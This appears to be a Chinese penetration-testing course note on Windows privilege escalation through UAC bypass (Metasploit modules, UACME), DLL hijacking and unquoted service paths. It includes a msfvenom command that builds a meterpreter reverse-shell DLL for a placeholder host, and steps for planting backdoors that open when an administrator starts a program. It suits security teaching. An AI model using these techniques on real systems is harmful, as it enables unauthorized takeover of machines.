权限提升-Win系统权限提升篇&计算机用户&UAC绕过&DLL劫持&未引号路径

知识点

1、计算机用户到System-入口点和应用点
2、计算机用户到System-UAC绕过&DLL劫持&未引号服务

章节点：
1、Web权限提升及转移
2、系统权限提升及转移
3、宿主权限提升及转移
4、域控权限提升及转移

应用场景：
1、常规某个机器被钓鱼后门攻击后，我们需要做更高权限操作或权限维持等。
2、内网域中某个机器被钓鱼后门攻击后，我们需要对后续内网域做安全测试。

基础点

0、为什么我们要学习权限提升转移技术：

简单来说就是达到目的过程中需要用到它

1、具体有哪些权限需要我们了解掌握的：

后台权限
数据库权限
Web权限
计算机用户权限
计算机系统权限
宿主机权限
域控制器权限

2、以上常见权限获取方法简要归类说明：

后台权限：SQL注入，数据库泄漏，弱口令攻击，未授权访问等造成
数据库权限：SQL注入，数据库泄漏，弱口令攻击，未授权访问等造成
Web权限：RCE,反序列化,文件上传等直达或通过后台数据库间接造成
计算机用户权限：弱口令,数据泄漏等直达或通过Web，服务器及域控转移造成
计算机系统权限：系统内核漏洞,钓鱼后门攻击,主机软件安全直达或上述权限提升造成
宿主机权限：Docker不安全配置或漏洞权限提升直达（服务资产造成入口后提升）
域控制器权限：内网域计算机用户提升或自身内核漏洞，后门攻击，主机软件安全直达

3、以上常见权限获取后能操作的具体事情：

后台权限：文章管理，站点管理，模版管理，数据管理，上传管理等
数据库权限：操作数据库的权限，数据增删改查等（以数据库用户为主）
Web权限：源码查看，源码文件增删改查，磁盘文件文件夹查看(以权限配置为主)
计算机用户权限：就如同自己电脑上普通用户能操作的情况（敏感操作会被禁止）
计算机系统权限：就如同自己电脑上能操作的情况（整个系统都是你的）
宿主机权限：就如同自己电脑上能操作的情况（整个系统都是你的）
域控制器权限：就如同自己电脑上能操作的情况（整个内网域系统都是你的）

4、以上常见权限在实战中的应用场景介绍：

当我们通过弱口令进入到应用后台管理
当我们下载备份文件获取到数据库信息
当我们通过漏洞拿到资产系统的Web权限
当我们在公司被给予账号密码登录计算机或系统
当我们在公司或钓鱼后门获取到某个公司机器系统
.....................................

一、演示案例-Win系统提权-本地管理用户-UAC绕过

win7之后的系统才会有UAC这个东西

Win10-BypassUAC自动提权-MSF&UACME

为了远程执行目标的exe或者bat可执行文件需要绕过此安全机制
在用户到系统权限自动提权中也学通过BypassUAC实现自动化提权
绕过项目：MSF内置，Powershell渗透框架，UACME项目(推荐)

1、MSF绕过UAC常用模块

use exploit/windows/local/bypassua  //针对旧版本的win7
use exploit/windows/local/bypassuac_sluihijack  //针对新版本的win10/win11等
use exploit/windows/local/bypassuac_silentcleanup //针对新版本的win10/win11等

2、UACME项目

https://github.com/hfiref0x/UACME

Akagi64.exe 编号(1-78) 调用执行(x.exe)

二、演示案例-Win系统提权-本地普通用户/WEB权限-DLL劫持(被动等待)

Windows-DLL劫持提权应用配合MSF-FlashFXP

原理：Windows应用程序启动的时候需要DLL。如果这些DLL 不存在，则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常，Windows应用程序有其预定义好的搜索DLL的路径，它会根据下面的顺序进行搜索：

1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory，CWD
6、在PATH环境变量的目录（先系统后用户）

过程：信息收集-进程调试-制作dll并上传-替换dll-等待管理员启动应用成功

检测应用程序调用的dll

1、ChkDllHijack
https://github.com/anhkgg/anhkgg-tools


2、火绒剑

使用MSF生成dll后门文件并替换程序里调用的dll

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx  lport=xx -f dll -o xiaodi.dll

等待目标管理员启动应用成功上线后门

提前信息收集相关软件及DLL问题程序，本地调试成功后覆盖DLL实现利用

三、演示案例-Win系统提权-本地普通用户/WEB权限-未引号服务(被动等待)

Windows-不带引号服务路径配合MSF-MacroExpert

原理：服务路径配置由于目录空格问题，可上传文件配合解析恶意触发执行



过程：检测服务权限配置-制作文件并上传-服务路径指向解析-等待调用成功
检测命令：

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

上传反弹exe，设置好对应执行名后等待管理员重启服务上线后门